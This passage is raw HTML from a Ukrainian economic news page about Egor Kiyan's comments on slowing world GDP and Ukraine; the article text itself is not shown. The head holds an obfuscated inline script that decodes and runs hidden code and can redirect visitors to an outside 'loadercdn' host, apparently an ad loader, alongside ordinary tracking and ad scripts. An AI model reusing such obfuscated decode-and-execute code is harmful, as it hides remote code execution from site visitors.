<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/07/57286206_646707605773286_3380827414497067008_n.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="360" /><meta property="og:image:alt" content="Егор Киян рассказал о влиянии замедления роста мирового ВВП на экономику Украины " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><meta name="description" content="Международные аудиторы продолжают ухудшать прогнозы роста мировой экономики. Международный валютный фонд в третий раз за текущий год снизил оценку мирового ВВП. Особенно опасны риски падения ВВП для развивающихся стран, к которым относится Украина." /><meta property="og:description" content="Международные аудиторы продолжают ухудшать прогнозы роста мировой экономики. Международный валютный фонд в третий раз за текущий год снизил оценку мирового ВВП. Особенно опасны риски падения ВВП для развивающихся стран, к которым относится Украина." /><meta name="keywords" content="егор киян,новости экономики,эксклюзивные новости" /><link rel="canonical" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" /><meta property="og:url" content="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4766836';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4766836&amp;a=3175" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:3px"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_economy/full/2907-egor-kiyan-rasskazal-o-vliyanii-zamedleniya-rosta-mirovogo-vvp-na-ekonomiku-ukrainy?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>25.64</td><td>25.32</td><td>25.44</td> </tr> <tr class="tr_white"><td>EUR</td><td>28.62</td><td>28.05</td><td>28.34</td> </tr> <tr><td>RUB</td><td>0.41</td><td>0.32</td><td>0.40</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>540.63</td><td>0.00</td><td>20:36 29.07.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1614.96</td><td>1.73</td><td>17:00 29.07.2019</td> </tr> <tr> <td>RTS</td><td>1353.61</td><td>0.39</td><td>18:50 29.07.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>63.63</td><td>+0.27</td><td style="text-transform:uppercase;">Jul</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li id="menu-item-1" ><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2907-avtokraz-predstavil-ocherednuyu-novinku-dlya-ukrainskix-voennyx" title="АвтоКрАЗ представил очередную новинку для украинских военных"><img width="210" height="156" alt="АвтоКрАЗ представил очередную новинку для украинских военных" src="https://enovosty.com/wp-content/uploads/2019/07/212-e1564392937666.jpg"></a><a href="https://enovosty.com/news-auto/full/2907-avtokraz-predstavil-ocherednuyu-novinku-dlya-ukrainskix-voennyx" title="АвтоКрАЗ представил очередную новинку для украинских военных" class="name">АвтоКрАЗ представил очередную новинку для украинских военных <span>(768)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/2907-oboronnaya-promyshlennost-kitaya-razvivaetsya-neveroyatnymi-tempami-i-obgonyaet-ssha" title="Оборонная промышленность Китая развивается невероятными темпами и обгоняет США"><img width="210" height="156" alt="Оборонная промышленность Китая развивается невероятными темпами и обгоняет США" src="https://enovosty.com/wp-content/uploads/2019/07/1-25-e1564392082434.jpg"></a><a href="https://enovosty.com/news_abroad/full/2907-oboronnaya-promyshlennost-kitaya-razvivaetsya-neveroyatnymi-tempami-i-obgonyaet-ssha" title="Оборонная промышленность Китая развивается невероятными темпами и обгоняет США" 